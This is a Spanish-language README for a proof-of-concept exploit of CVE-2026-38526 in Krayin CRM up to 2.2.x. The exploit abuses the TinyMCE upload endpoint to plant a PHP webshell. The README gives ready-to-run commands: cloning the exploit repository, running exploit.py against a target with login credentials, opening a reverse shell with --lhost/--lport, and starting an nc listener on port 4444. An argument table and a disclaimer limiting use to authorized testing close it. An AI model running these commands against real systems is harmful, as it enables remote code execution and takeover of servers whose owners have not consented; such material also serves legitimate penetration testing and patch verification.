
Prueba de concepto de CVE-2026-38526 en Krayin CRM <= v2.2.x. Carga arbitraria de archivos que conduce a ejecución remota de código.
Krayin CRM (≤ 2.2.x) - Carga de archivos sin restricciones que conduce a la ejecución remota de código.
Este PoC aprovecha el endpoint vulnerable de carga de TinyMCE (/admin/tinymce/upload) para subir un webshell PHP y lograr la ejecución de comandos en el servidor.
git clone https://github.com/pawpic/CVE-2026-38526-POC
pip3 install requests beautifulsoup4
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
-c "whoami"
Inicia el listener:
nc -lvnp 4444
Ejecuta el exploit:
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR
Este exploit está destinado únicamente a fines educativos y pruebas de penetración autorizadas. El uso no autorizado contra sistemas para los que no tengas permiso explícito de prueba es ilegal.
Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526
Autor: pawpic Fecha: 2026
| Argumento | Descripción | Requerido |
|---|
| -u, --url | URL base del objetivo | Sí |
| -e, --email | Correo electrónico de inicio de sesión | Sí |
| -p, --password | Contraseña de inicio de sesión | Sí |
| -c, --cmd | Ejecutar un único comando | No |
| --lhost | Tu IP para la shell inversa | Sí (si no se usa --cmd) |
| --lport | Puerto de escucha | No (predeterminado: 4444) |